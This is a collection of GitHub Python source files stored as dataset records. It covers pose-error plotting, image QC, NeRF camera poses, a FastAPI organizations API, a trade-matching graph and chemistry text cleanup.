chi_open\n","repo_name":"miklakt/ascf_pb","sub_path":"ascf_pb/brush_geometry/pore.py","file_name":"pore.py","file_ext":"py","file_size_in_byte":5293,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"71166285801","text":"from time_sync import magnitude\nimport numpy as np\nfrom mediapipe import solutions\nimport matplotlib.pyplot as plt\n\ndef calculate_error(capture, VIDEO):\n if not VIDEO.reference and capture.video.reference:\n return\n\n factor = len(VIDEO.Captures)/len(capture.video.Captures)\n\n u1 = capture.video.All_Normalized_Landmarks[capture.time]\n u2 = VIDEO.All_Normalized_Landmarks[int(capture.time * factor)]\n\n errors = np.array(u1) - np.array(u2)\n\n _ = []\n for i in range(len(errors)):\n _.append(magnitude(errors[i]))\n errors = _\n\n mean_error = np.mean(errors)\n\n connection_errors = []\n for connection in solutions.pose.POSE_CONNECTIONS:\n connection_errors.append((errors[connection[0]] + errors[connection[1]])*0.5)\n\n\n scaled_connection_errors = []\n for error in connection_errors:\n scaled_connection_errors.append((error - min(connection_errors)) / (max(connection_errors) - min(connection_errors)))\n\n _ = []\n __ = []\n for i in range(len(scaled_connection_errors)):\n _.append(list(solutions.pose.POSE_CONNECTIONS)[scaled_connection_errors.index(max(scaled_connection_errors))])\n __.append(max(scaled_connection_errors)*255)\n scaled_connection_errors[scaled_connection_errors.index(max(scaled_connection_errors))] = -1\n\n to_mark = dict(zip(_, __))\n\n return mean_error, to_mark\n\n\ndef visualize(capture, mean_errors, extraction_image, segmentation_image):\n images = [extraction_image, segmentation_image]\n\n for img in range(len(images)):\n fig = plt.figure(figsize=(images[img].shape[1] / 100, images[img].shape[0] / 500), facecolor=\"grey\")\n fig.add_subplot(121)\n plt.xlim([0, len(capture.video.Captures)])\n plt.ylim([0, 1])\n plt.plot(mean_errors)\n\n fig.add_subplot(122)\n plt.ylim([0, 1])\n plt.bar(1, mean_errors[-1])\n\n fig.canvas.draw()\n image_from_plot = np.frombuffer(fig.canvas.tostring_rgb(), dtype=np.uint8)\n image_from_plot = image_from_plot.reshape(fig.canvas.get_width_height()[::-1] + (3,))\n\n fig.clf()\n\n images[img] = np.concatenate((images[img], image_from_plot), axis=0)\n\n return images[0], images[1]\n","repo_name":"efe-u/AI_Tennis_Coach","sub_path":"error_calculator.py","file_name":"error_calculator.py","file_ext":"py","file_size_in_byte":2205,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"70130598441","text":"from src.ecs.clocks import delta_time\nfrom src.ecs.requirements.has import has\n\n\ndef apply_force(tractor):\n if tractor.traction_enabled:\n print('Traction enabled')\n tractor.velocity += \\\n tractor.traction_direction.rotated(\n tractor.rotation\n if hasattr(tractor, \"rotation\") else 0) \\\n * tractor.traction_force \\\n * delta_time() \\\n / tractor.mass\n\n\ntraction = (\n (\"tractor\" |\n has(\"velocity\") &\n has(\"traction_force\") &\n has(\"traction_direction\") &\n has(\"mass\")\n ) >> apply_force,\n)\n","repo_name":"girvel/DyingSpace","sub_path":"src/systems/physics/traction/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":597,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"71180662761","text":"from conv import Conv2D\nfrom PIL import Image\nfrom torchvision import transforms, utils\nfrom torch.autograd import Variable\nfrom torchvision.utils import save_image as save\nimport torch\nimport uuid\nfrom datetime import datetime\nimport matplotlib.pyplot as plt\nimport numpy as np\n\ndef save_outputs(output_image, task_name):\n for image in output_image:\n save(image, str(uuid.uuid4()) + \"_\" + task_name + \".png\")\n\nif __name__ == '__main__':\n cat1 = Image.open(\"cat2.jpg\")\n loader = transforms.Compose([transforms.ToTensor()])\n image = Variable(loader(cat1)).data\n #task 1\n conv2d_1 = Conv2D(in_channel=3, o_channel=1, kernel_size=3, stride=1)\n num_op, output_image = conv2d_1.forward(image)\n #num_op, output_image = conv2d_1.scipy_convolve(image)\n print(\"task 1: \", num_op)\n save_outputs(output_image, \"task1\")\n #task 2\n conv2d_2 = Conv2D(in_channel=3, o_channel=2, kernel_size=5, stride=1)\n num_op, output_image = conv2d_2.forward(image)\n #num_op, output_image = conv2d_2.scipy_convolve(image)\n print(\"task 2: \", num_op)\n save_outputs(output_image, \"task2\")\n #task 3\n conv2d_3 = Conv2D(in_channel=3, o_channel=3, kernel_size=3, stride=2)\n num_op, output_image = conv2d_3.forward(image)\n print(\"task 3: \", num_op)\n save_outputs(output_image, \"task3\")\n\n #part B\n if conv2d_1.set_mode('rand'):\n times = []\n for i in range(11):\n if conv2d_1.set_o_channel(2 ** i):\n start = datetime.now()\n numops, output_image = conv2d_1.forward(image)\n delta = datetime.now()-start\n print(i, 2 ** i, delta)\n times.append(delta)\n np.save(\"times\", times)\n plt.plot(range(11), times)\n plt.show()\n\n #part C\n if conv2d_2.set_mode('rand'):\n times = []\n for i in range(3, 13, 2):\n if conv2d_2.set_kernel_size(i):\n numops, output_image = conv2d_2.forward(image)\n print(i, numops)\n times.append(numops)\n np.save(\"ctimes\", times)\n plt.plot(range(3, 13, 2), times)\n plt.show()\n","repo_name":"exponentialbit1024/PurdueCS","sub_path":"BME495/hw1/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2138,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"7300316025","text":"\"\"\"Gaussian filter QC algorithm.\"\"\"\n\nimport numpy as np\nimport slideflow as sf\nimport skimage\nfrom slideflow import errors\nfrom typing import Union\n\nclass Gaussian:\n\n def __init__(\n self,\n mpp: float = 4,\n sigma: int = 3,\n threshold: float = 0.02\n ) -> None:\n \"\"\"QC via Gaussian filtering.\n\n Args:\n mpp (float): Microns-per-pixel at which to perform filtering.\n Defaults to 4.\n sigma (int): Sigma (radius) for Gaussian filter. Defaults to 3.\n threshold (float): Gaussian threshold. Defaults to 0.02.\n \"\"\"\n self.mpp = mpp\n self.sigma = sigma\n self.threshold = threshold\n\n def __repr__(self):\n return \"Gaussian(mpp={!r}, sigma={!r}, threshold={!r})\".format(\n self.mpp, self.sigma, self.threshold\n )\n\n def _thumb_from_slide(\n self,\n wsi: \"sf.WSI\"\n ) -> np.ndarray:\n \"\"\"Get a thumbnail from the given slide.\n\n Args:\n wsi (sf.WSI): Whole-slide image.\n\n Returns:\n np.ndarray: RGB thumbnail of the whole-slide image.\n \"\"\"\n thumb = wsi.thumb(mpp=self.mpp)\n if thumb is None:\n raise errors.QCError(\n f\"Thumbnail error for slide {wsi.shortname}, QC failed\"\n )\n thumb = np.array(thumb)\n if thumb.shape[-1] == 4:\n thumb = thumb[:, :, :3]\n return thumb\n\n def __call__(\n self,\n wsi: Union[\"sf.WSI\", np.ndarray],\n ) -> np.ndarray:\n \"\"\"Perform Gaussian filtering on the given slide or image.\n\n Args:\n slide (sf.WSI, np.ndarray): Either a Slideflow WSI or a numpy array,\n with shape (h, w, c) and type np.uint8.\n\n Returns:\n np.ndarray: QC boolean mask, where True = filtered out.\n \"\"\"\n if isinstance(wsi, sf.WSI):\n thumb = self._thumb_from_slide(wsi)\n else:\n thumb = wsi\n\n gray = skimage.color.rgb2gray(thumb)\n img_laplace = np.abs(skimage.filters.laplace(gray))\n gaussian = skimage.filters.gaussian(img_laplace, sigma=self.sigma)\n mask = gaussian <= self.threshold\n\n # Assign blur burden value\n existing_qc_mask = wsi.qc_mask\n if isinstance(wsi, sf.WSI) and existing_qc_mask is not None:\n mask = skimage.transform.resize(mask, existing_qc_mask.shape)\n mask = mask.astype(bool)\n blur = np.count_nonzero(\n np.logical_and(\n mask,\n np.logical_xor(mask, existing_qc_mask)\n )\n )\n wsi.blur_burden = blur / (mask.shape[0] * mask.shape[1])\n sf.log.debug(f\"Blur burden: {wsi.blur_burden}\")\n\n return mask","repo_name":"abdulkarimab/slideflow","sub_path":"slideflow/slide/qc/gaussian.py","file_name":"gaussian.py","file_ext":"py","file_size_in_byte":2793,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"18"} +{"seq_id":"23164626092","text":"from typing import List\nfrom uuid import UUID\n\nfrom fastapi import APIRouter, Depends, HTTPException, Response, status\n\nfrom app.api.dependencies import get_api_key, get_db\nfrom app.db.database import MSSQLConnection\nfrom app.schemas.organizations import (\n OrganizationCreateRequest,\n OrganizationResponse,\n OrganizationUpdateRequest,\n)\nfrom app.services.exceptions import (\n InternalDatabaseError,\n InvalidAuthenticationKeyForRequest,\n)\nfrom app.services.organizations import OrganizationService\n\nrouter = APIRouter()\n\n\n@router.get(\"\", response_model=List[OrganizationResponse])\nasync def list_organizations(\n db: MSSQLConnection = Depends(get_db),\n) -> List[OrganizationResponse]:\n \"\"\"\n **Retrieves the list of organizations.**\n \"\"\"\n # TODO: Filter by name\n return await OrganizationService(db).get_multi()\n\n\n@router.get(\n \"/{organization_id}\",\n response_model=OrganizationResponse,\n responses={\n status.HTTP_404_NOT_FOUND: {\n \"description\": \"The organization with the specified id could not \"\n \"be found.\"\n }\n },\n)\nasync def retrieve_organization_by_id(\n organization_id: int, db: MSSQLConnection = Depends(get_db)\n) -> OrganizationResponse:\n \"\"\"\n **Retrieves an organization with the id from the `organization_id` path\n parameter.**\n \"\"\"\n organization = await OrganizationService(db).get(organization_id)\n if organization is None:\n raise HTTPException(status_code=status.HTTP_404_NOT_FOUND)\n return organization\n\n\n@router.post(\n \"\",\n response_model=OrganizationResponse,\n responses={\n status.HTTP_401_UNAUTHORIZED: {\"description\": \"Invalid credentials.\"},\n status.HTTP_403_FORBIDDEN: {\n \"description\": \"Invalid permissions or credentials.\"\n },\n },\n)\nasync def create_organization(\n body: OrganizationCreateRequest,\n db: MSSQLConnection = Depends(get_db),\n api_key: UUID = Depends(get_api_key),\n) -> OrganizationResponse:\n \"\"\"\n **Creates a new organization with the entity enclosed in the request\n body.** On success, the new organization is returned in the body of the\n response.\n \"\"\"\n try:\n organization = await OrganizationService(db).create(body, api_key)\n except InvalidAuthenticationKeyForRequest as e:\n raise HTTPException(status.HTTP_403_FORBIDDEN, e.message)\n except InternalDatabaseError:\n raise HTTPException(status.HTTP_500_INTERNAL_SERVER_ERROR)\n return organization\n\n\n@router.put(\n \"/{organization_id}\",\n response_model=OrganizationResponse,\n responses={\n status.HTTP_401_UNAUTHORIZED: {\"description\": \"Invalid credentials.\"},\n status.HTTP_403_FORBIDDEN: {\n \"description\": \"Invalid permissions or credentials.\"\n },\n status.HTTP_404_NOT_FOUND: {\n \"description\": \"The organization with the specified id could not \"\n \"be found.\"\n },\n },\n)\nasync def update_organization(\n organization_id: int,\n body: OrganizationUpdateRequest,\n db: MSSQLConnection = Depends(get_db),\n api_key: UUID = Depends(get_api_key),\n) -> OrganizationResponse:\n \"\"\"\n **Updates an organization with the id from the `organization_id` path\n parameter with the entity enclosed in the request body.** On success,\n the updated organization is returned in the body of the response.\n \"\"\"\n # Check if organization with the id exists\n organization = await OrganizationService(db).get(organization_id)\n if not organization:\n raise HTTPException(status_code=status.HTTP_404_NOT_FOUND)\n # Perform update\n try:\n organization = await OrganizationService(db).update(\n organization_id, body, api_key\n )\n except InvalidAuthenticationKeyForRequest as e:\n raise HTTPException(status.HTTP_403_FORBIDDEN, e.message)\n except InternalDatabaseError:\n raise HTTPException(status.HTTP_500_INTERNAL_SERVER_ERROR)\n return organization\n\n\n@router.delete(\n \"/{organization_id}\",\n status_code=status.HTTP_204_NO_CONTENT,\n responses={\n status.HTTP_204_NO_CONTENT: {\n \"description\": \"The organization with the specified id has been \"\n \"successfully deleted.\"\n },\n status.HTTP_401_UNAUTHORIZED: {\"description\": \"Invalid credentials.\"},\n status.HTTP_403_FORBIDDEN: {\n \"description\": \"Invalid permissions or credentials.\"\n },\n status.HTTP_404_NOT_FOUND: {\n \"description\": \"The organization with the specified id could not \"\n \"be found.\"\n },\n },\n)\nasync def delete_organization_by_id(\n organization_id: int,\n db: MSSQLConnection = Depends(get_db),\n api_key: UUID = Depends(get_api_key),\n) -> Response:\n \"\"\"\n **Deletes an organization with the id from the `organization_id` path\n parameter.**\n \"\"\"\n # Check if organization with the id exists\n organization = await OrganizationService(db).get(organization_id)\n if not organization:\n raise HTTPException(status_code=status.HTTP_404_NOT_FOUND)\n # Perform deletion\n try:\n await OrganizationService(db).delete(organization_id, api_key)\n except InvalidAuthenticationKeyForRequest as e:\n raise HTTPException(status.HTTP_403_FORBIDDEN, e.message)\n except InternalDatabaseError:\n raise HTTPException(status.HTTP_500_INTERNAL_SERVER_ERROR)\n return Response(status_code=status.HTTP_204_NO_CONTENT)\n","repo_name":"Vaccine-Hunters-Canada/VaxFinder-backend","sub_path":"app/api/api_v1/endpoints/organizations.py","file_name":"organizations.py","file_ext":"py","file_size_in_byte":5463,"program_lang":"python","lang":"en","doc_type":"code","stars":32,"dataset":"github-code","pt":"18"} +{"seq_id":"69823014119","text":"n, m = list(map(int, input().split()))\nfibRem = [0, 1, 1]\nsearch = [0, 1, 1]\nfound = False\nwhile True:\n x = (fibRem[-1] + fibRem[-2]) % m\n fibRem.append(x)\n search.append(x)\n search.pop(0)\n if search == [0, 1, 1]:\n fibRem = fibRem[:-3]\n break\n#print(fibRem)\nn = n % len(fibRem)\nprint(fibRem[n])\n","repo_name":"Keshav077/Coursera-Assignments","sub_path":"Algorithmic Tools/Week 2/Fibonacci Number Again.py","file_name":"Fibonacci Number Again.py","file_ext":"py","file_size_in_byte":324,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"72352335719","text":"import networkx as nx\nimport csv\n\n\n# parses the csv file and returns the data which is a list of lists\ndef parse_data(csv_file):\n with open(csv_file) as f:\n csv_f = csv.reader(f)\n\n data = []\n\n for row in csv_f:\n item = []\n for col in row:\n item.append(col)\n data.append(item)\n\n return data\n\n\n# calculates the weight for the inputted edge.\ndef calc_weight(G, a, b):\n if G.node[a][\"Country\"] == G.node[b][\"Country\"]:\n if G.node[a][\"State\"] == G.node[b][\"State\"]:\n if G.node[a][\"City\"] == G.node[b][\"City\"]:\n return 1\n else:\n return 2\n else:\n return 4\n else:\n return 9\n\n\n# adds vertices from the data to the graph\ndef add_vertices(G, data):\n for i in range(len(data)):\n G.add_node(int(data[i][0]), Country=data[i][1], State=data[i][2],\n City=data[i][3], Name=data[i][4], Offering=data[i][5],\n #OfferingCategory=data[i][6] ,\n Seeking=data[i][6],\n #SeekingCategory=data[i][8],\n URL=data[i][7])\n\n\n# adds edges from the data to the graph\ndef add_edges(G):\n for offering_node in G.node:\n for seeking_node in G.node:\n if (offering_node != seeking_node) and (\n G.node[offering_node]['Offering'] in G.node[seeking_node]['Seeking']):\n G.add_edge(offering_node, seeking_node, weight=calc_weight(G, offering_node, seeking_node))\n\n\n# def category_heuristic(a, b):\n# if G.node[a][\"OfferingCategory\"] == G.node[b][\"OfferingCategory\"]:\n# return 1\n# else:\n# return 3\n\n# creates two lists seekingList, offeringList for checking if an item exists in the graph\ndef create_items_lists(data):\n seekingList = []\n offeringList = []\n for i in range(len(data)):\n offeringList.append(data[i][6])\n seekingList.append(data[i][5])\n return seekingList, offeringList\n\n\n# runs the parse method and lists method. then creates the graph\ndef parse_and_init(csv_file):\n data = parse_data(csv_file)\n\n seekingList, offeringList = create_items_lists(data)\n\n G = nx.DiGraph()\n add_vertices(G, data)\n add_edges(G)\n\n return G, seekingList, offeringList\n\ndef find_index_matches_in_seeking(word, lst):\n indexes = []\n for i in range(len(lst)):\n if word in lst[i]:\n indexes.append(i)\n return indexes\n\ndef find_index_matches_in_offering(word, lst):\n indexes = []\n for i in range(len(lst)):\n if word == lst[i]:\n indexes.append(i)\n return indexes\n\n\n# first checks if the items exists and then searches for the shortest path\ndef search_match(graph, seekingList, offeringList, seeking_product, offering_product):\n seekingIdxOccurrence = find_index_matches_in_seeking(seeking_product, seekingList)\n if len(seekingIdxOccurrence) == 0:\n return \"noSeek\"\n\n offeringIdxOccurrence = find_index_matches_in_offering(offering_product, offeringList)\n if len(offeringIdxOccurrence) == 0:\n return \"noHave\"\n\n paths = []\n for idx_offer in offeringIdxOccurrence:\n for idx_seek in seekingIdxOccurrence:\n try:\n paths.append(nx.astar_path(graph, offeringIdxOccurrence[0],\n seekingIdxOccurrence[0]))\n except nx.NetworkXNoPath:\n pass\n items_list = []\n url_list = []\n if len(paths) != 0:\n min(paths)\n for node in min(paths):\n items_list.append(graph.node[node][\"Offering\"])\n url_list.append(graph.node[node][\"URL\"])\n return {\"items\": items_list, \"link\": url_list}\n else:\n return \"noPath\"\n\n\n# nx.write_graphml(G, \"plot1.graphml\")\n\n","repo_name":"AsafEtzion/TradeUp","sub_path":"flatty/theme/graph.py","file_name":"graph.py","file_ext":"py","file_size_in_byte":3795,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"20779217310","text":"from imports import tf, np\n\ndef get_translation_t(t):\n \"\"\"Get the translation matrix for movement in t.\"\"\"\n matrix = [\n [1, 0, 0, 0],\n [0, 1, 0, 0],\n [0, 0, 1, t],\n [0, 0, 0, 1],\n ]\n return tf.convert_to_tensor(matrix, dtype=tf.float32)\n\n\ndef get_rotation_phi(phi):\n \"\"\"Get the rotation matrix for movement in phi.\"\"\"\n matrix = [\n [1, 0, 0, 0],\n [0, tf.cos(phi), -tf.sin(phi), 0],\n [0, tf.sin(phi), tf.cos(phi), 0],\n [0, 0, 0, 1],\n ]\n return tf.convert_to_tensor(matrix, dtype=tf.float32)\n\n\ndef get_rotation_theta(theta):\n \"\"\"Get the rotation matrix for movement in theta.\"\"\"\n matrix = [\n [tf.cos(theta), 0, -tf.sin(theta), 0],\n [0, 1, 0, 0],\n [tf.sin(theta), 0, tf.cos(theta), 0],\n [0, 0, 0, 1],\n ]\n return tf.convert_to_tensor(matrix, dtype=tf.float32)\n\n\ndef pose_spherical(theta, phi, t):\n \"\"\"\n Get the camera to world matrix for the corresponding theta, phi\n and t.\n \"\"\"\n c2w = get_translation_t(t)\n c2w = get_rotation_phi(phi / 180.0 * np.pi) @ c2w\n c2w = get_rotation_theta(theta / 180.0 * np.pi) @ c2w\n c2w = np.array([[-1, 0, 0, 0], [0, 0, 1, 0], [0, 1, 0, 0], [0, 0, 0, 1]]) @ c2w\n return c2w\n\ndef sample_random_c2w():\n\ttheta = np.random.uniform(0., 360.)\n\tphi = np.random.uniform(-10., 90.)\n\tt = np.random.uniform(1.0, 1.5)\n\treturn pose_spherical(theta, phi, t)","repo_name":"NuoWenLei/DreamFusionImplementation","sub_path":"NeRF_camera.py","file_name":"NeRF_camera.py","file_ext":"py","file_size_in_byte":1418,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"26115432350","text":"import regex\n\nfrom chemdataextractor.doc import Paragraph\n\nfrom error import DatabaseError\n\n\ndef cleanup_text(para):\n \"\"\"Clean-up paragraph code\n :param para: (str or doc.Paragraph) Paragraph of paper\n :return: (str) clean up text\n \"\"\"\n\n def remove_dot(sentence):\n output = sentence.text\n if output[-1] in \".!?\":\n output = output[:-1]\n return output\n\n if isinstance(para, str):\n para = Paragraph(para)\n\n text = ' -end- '.join(map(remove_dot, para.sentences))\n text = text.replace('\\n', \" \")\n\n text = regex.sub(r\"i\\.e\\.(?=,|\\s)\", \"that is\", text) # remove i.e.\n text = regex.sub(r\"e\\.g\\.(?=,|\\s)\", \"for example\", text) # remove e.g.\n text = regex.sub(r\"al\\.,\", \"al. and\", text)\n text = regex.sub(r\"vs\\s?\\.\", 'vs', text) # change vs. -> vs\n\n # change unicode\n text = regex.sub(r\"[\\u2000-\\u2005\\u2007\\u2008]|\\xa0\", \" \", text)\n text = regex.sub(r\"[\\u2006\\u2009-\\u200F|\\u00ad]\", \"\", text)\n text = regex.sub(r\"[\\u2010-\\u2015]|\\u2212\", \"-\", text)\n text = regex.sub(r\"≈|∼\", \"~\", text)\n text = regex.sub(r\"\\u2032|\\u201B|\\u2019\", \"'\", text)\n text = regex.sub(r\"\\u2215\", \"/\", text)\n text = regex.sub(r\"\\u201A\", ',', text)\n text = regex.sub(r\"\\u201C|\\u201D|\\u2033\", '\"', text)\n\n text = regex.sub(r\"\\s?\\b[.][,-]+\\s?\", \" -end- \", text) # remove \".-\" or \".,,\" pattern\n text = regex.sub(r\"\\[\\s([,-]\\s)*\\]\", '', text) # remove [ , , ]\n text = regex.sub(r\"\\[([,-])+\\]\", '', text) # remove [,,]\n text = regex.sub(r\"\\b(([A-Za-z]{2,})[,.]\\d+[A-Za-z]?)\\b\", lambda t: t.group(2) + \" -end- \", text)\n text = regex.sub(r\"(?<=\\s)[.,-](?=\\s)\", \" \", text) # remove .,- between blanks\n text = regex.sub(r\"\\[\\]|\\(\\)|{}\", '', text) # remove (), [], {}\n text = regex.sub(r\"\\u2022|\\u2024|\\u2027|\\u00B7\", r\"\\u22C5\", text)\n\n\n # separate equality, inequality sign\n text = regex.sub(r\"(\\s?[\\u221F-\\u2281|\\u2284-\\u22C3\\u22CD-\\u22FF:;=><~]\\s?)\", lambda t: \" {} \".format(t.group(1)), text)\n\n figure_table = r\"(\\b([Ff]igure|[Tt]able|[Gg]raph|[Ss]cheme|[Ff]ig)(s|es)?(?:(?:[,]|and|[.]|\\s|[-]|\\B)+(?:S?\\d+|[A-Za-z]){1,2}\\b(?:\\s?[(][A-Za-z1-9][)]\\B)?)+?)\"\n text = regex.sub(figure_table, string=text, repl=lambda t: t.group(2))\n text = regex.sub(r\"(([(])?(Fig|Table|Figure|ESI)\\s?†(?(2)[)]))\", string=text, repl=\"\")\n\n # orbital (3p1/2 -> p'orbital)\n text = regex.sub(r\"([1-9]([spdfg])\\s?[13579]\\s?[/]\\s?2)\", lambda t: \"{}'orbital\".format(t.group(2)), text)\n\n # type II curve -> -type-\n roman_num = r\"\\b(?:iv|ix|(?:v|x)i{0,3}|i{1,3})\\b\"\n types = r'(?i)type(\\s-\\s|-|\\s)?(?P\\()?' + roman_num + r'(?(b)\\))(\\s-\\s|-|\\s)?(curve)?'\n text = regex.sub(types, \" -type-\", text)\n\n # Lee et al. -> -paper-\n text = regex.sub(pattern=r\"(\\s?\\b\\S+\\set\\.?\\sal(\\.)?(?(2)\\B|\\b)\\s?)\", string=text, repl=\" -paper- \")\n\n # https://email@domain -> -email-\n text = regex.sub(r\"((https?://)?\\S+[.](com|net|org|edu)(/\\S+)?)(?=\\s|$)\", \" -email- \", text)\n\n # isotope with NMR\n text = regex.sub(r\"(?P1H|2H|6Li|11B|13C|15N|19F|29Si|31P|195Pt)\\s?\\S*(nmr|NMR)\",\n lambda t: \"{}-NMR\".format(t.group(\"atom\")), text)\n # .,:;\n text = regex.sub(r'(?P(?<=\\S+)[.,:;\"](?=\\S+))|(?P
    (?<=(^|\\s|\\(|\\))[A-Za-z])[.\"](?=\\s|\\(|\\)|$))|[.,:;\"]',\n lambda t: t.group() if t.group(\"A\") or t.group(\"OL\") else \" {} \".format(t.group()), text)\n\n # lower first letter\n text = regex.sub(r\"(?<=(^|-end-)\\s*)(?P[A-Z][a-z]+)(?=\\s|$)\", lambda t: t.group('word').lower(), text)\n\n # remove apostrophe s ('s)\n text = regex.sub(r\"(?<=\\S+)'s(?=\\s|$)\", \" \", text)\n\n # separate bracket\n queue_bracket = []\n small_queue = []\n activation = True\n first_activation = False\n poly_activation = None\n\n for i, char in enumerate(text):\n if char in '({':\n small_queue.append(i)\n try:\n if text[i - 4:i] == 'poly':\n poly_activation = i\n elif activation:\n first_activation = True\n activation = False\n except IndexError:\n pass\n\n elif char == \" \" and not poly_activation:\n activation = True\n first_activation = False\n\n if small_queue:\n queue_bracket += small_queue\n small_queue.clear()\n\n elif char in ')}':\n if small_queue:\n pop_index = small_queue.pop()\n\n if poly_activation and not (poly_activation - pop_index):\n poly_activation = None\n\n elif not small_queue and first_activation:\n try:\n if text[i + 1] == ' ':\n queue_bracket.append(pop_index)\n queue_bracket.append(i)\n except IndexError:\n queue_bracket.append(pop_index)\n queue_bracket.append(i)\n\n first_activation = False\n else: # Already removed\n queue_bracket.append(i)\n else:\n activation = False\n\n queue_bracket += small_queue\n\n revised_text = \"\"\n for i, char in enumerate(text):\n if i in queue_bracket:\n revised_text += \" {} \".format(char)\n else:\n revised_text += char\n\n # Remove 'a' and 'the'\n revised_text = regex.sub(r\"(?<=^|\\s)(?:a|the|an)(?=\\s|$)\", \" \", revised_text).strip()\n\n revised_text = regex.sub(r\"\\s+\", \" \", revised_text)\n return revised_text\n\n\ndef split_text(text, concat_bracket=False):\n split = text.split()\n new_split = []\n activation = False\n for word in split:\n if regex.match(r\"^-(num|strange)\\(\", word):\n if regex.match(r\".+\\)-$\", word):\n pass\n else:\n activation = True\n new_split.append(word)\n elif activation:\n if regex.match(r\".+\\)-$\", word):\n activation = False\n new_split[-1] += \" \" + word\n else:\n new_split.append(word)\n\n if not concat_bracket:\n return new_split\n\n right_bracket = regex.compile(r\"\\)|\\]|\\}\")\n left_bracket = regex.compile(r\"\\(|\\[|\\{\")\n mini_batch = []\n batch = []\n activation = 0\n for word in new_split:\n if activation:\n mini_batch.append(word)\n rb = right_bracket.findall(word)\n lb = left_bracket.findall(word)\n if len(rb) - len(lb) == 1:\n activation = 0\n batch.append(\" \".join(mini_batch))\n mini_batch.clear()\n elif activation:\n activation -= 1\n else:\n assert activation == 0\n batch += mini_batch\n mini_batch.clear()\n else:\n lb = left_bracket.findall(word)\n if not lb:\n batch.append(word)\n else:\n rb = right_bracket.findall(word)\n if len(lb) - len(rb) == 1 and word not in ['(', '[', '{']:\n mini_batch.append(word)\n activation = 3\n else:\n batch.append(word)\n\n return batch\n\n\ndef identify_tag(label: str):\n if not label:\n return None\n elif regex.match(r\"^-num([(].+[)])?-$\", label):\n return \"number\"\n elif regex.match(r\"^-strange\\(.+\\)-$\", label):\n return 'strange'\n\n tag = regex.match(r\"^-(?Pc|u|n|a|e|i|s)\\d\\d\\d\\d\\d\\d-$\", label)\n if not tag:\n return None\n tag_v = tag.group('tag')\n tag_dict = {'c': 'chemical', 'n': 'number', 'u': 'unit', 'e': 'element', 's': 'small_molecule', 'i': 'ion'}\n return tag_dict[tag_v]\n\n\ndef get_name(word, database):\n \"\"\" find original word\n :param word: (str) word\n :param database: (dict) dictionary of DataStorage, UnitStorage\n :return: (str) original word\n \"\"\"\n\n ELEMENT = [\"H\", \"He\", \"Li\", \"Be\", \"B\", \"C\", \"N\", \"O\", \"F\", \"Ne\", \"Na\", \"Mg\", \"Al\", \"Si\", \"P\", \"S\", \"Cl\", \"Ar\", \"K\",\n \"Ca\", \"Sc\", \"Ti\", \"V\", \"Cr\", \"Mn\", \"Fe\", \"Co\", \"Ni\", \"Cu\", \"Zn\", \"Ga\", \"Ge\", \"As\", \"Se\", \"Br\", \"Kr\",\n \"Rb\", \"Sr\", \"Y\", \"Zr\", \"Nb\", \"Mo\", \"Tc\", \"Ru\", \"Rh\", \"Pd\", \"Ag\", \"Cd\", \"In\", \"Sn\", \"Sb\", \"Te\", \"I\",\n \"Xe\", \"Cs\", \"Ba\", \"La\", \"Ce\", \"Pr\", \"Nd\", \"Pm\", \"Sm\", \"Eu\", \"Gd\", \"Tb\", \"Dy\", \"Ho\", \"Er\", \"Tm\", \"Yb\",\n \"Lu\", \"Hf\", \"Ta\", \"W\", \"Re\", \"Os\", \"Ir\", \"Pt\", \"Au\", \"Hg\", \"Tl\", \"Pb\", \"Bi\", \"Po\", \"At\", \"Rn\", \"Fr\",\n \"Ra\", \"Ac\", \"Th\", \"Pa\", \"U\", \"Np\", \"Pu\", \"Am\", \"Cm\", \"Bk\", \"Cf\", \"Es\", \"Fm\", \"Md\", \"No\", \"Lr\", \"Rf\",\n \"Db\", \"Sg\", \"Bh\", \"Hs\", \"Mt\", \"Ds\", \"Rg\", \"Cn\", \"Nh\", \"Fl\", \"Mc\", \"Lv\", \"Ts\", \"Og\", \"Uue\"]\n\n tag = identify_tag(word)\n\n if not tag:\n return word\n elif tag == 'number':\n num = regex.match(r\"^-num[(](?P.+)[)]-$\", word)\n if num:\n return num.group(\"num\")\n return \"-num-\"\n elif tag == 'element':\n index = regex.match(r\"^-e(\\d+)-$\", word).group(1)\n return ELEMENT[int(index)]\n elif tag == 'strange':\n strange = regex.match(r\"^-strange[(](?P.+)[)]-$\", word)\n if strange:\n return strange.group(\"strange\")\n else:\n return None\n else:\n try:\n data_storage = database[tag]\n except KeyError:\n raise DatabaseError(f'{tag} not in database dictionary')\n\n return data_storage[word]\n\n\ndef _change_to_regex_string(chemical_list, original_list=None, return_as_str=False):\n \"\"\"\n Change to regex form string / list\n :param chemical_list: (list) list of chemical\n :param original_list: (list) list that original change_to_re list\n :param return_as_str: (bool) if True, return (str). Else, return list\n :return: (list or str)\n \"\"\"\n\n new_list = []\n if isinstance(chemical_list, str):\n chemical_list = [chemical_list]\n if not isinstance(original_list, list):\n original_list = []\n\n for chemical in chemical_list:\n if not chemical:\n continue\n elif not isinstance(chemical, str):\n chemical = str(chemical)\n\n chemical_revised = regex.sub(pattern=r\"(?:\\[|\\]|\\(|\\)|\\.|\\,|\\-|\\*|\\?|\\{|\\}|\\$|\\^|[|]|\\+|\\\\)\",\n string=chemical, repl=lambda t: r\"\\{}\".format(t.group()))\n\n if chemical_revised in original_list or chemical_revised in new_list:\n continue\n elif regex.match(pattern=chemical_revised, string=chemical): # Assert re_form == original form\n new_list.append(chemical_revised)\n else:\n raise AssertionError\n\n new_list += original_list\n new_list = sorted(new_list, reverse=True)\n\n if return_as_str:\n return r\"|\".join(new_list)\n else:\n return 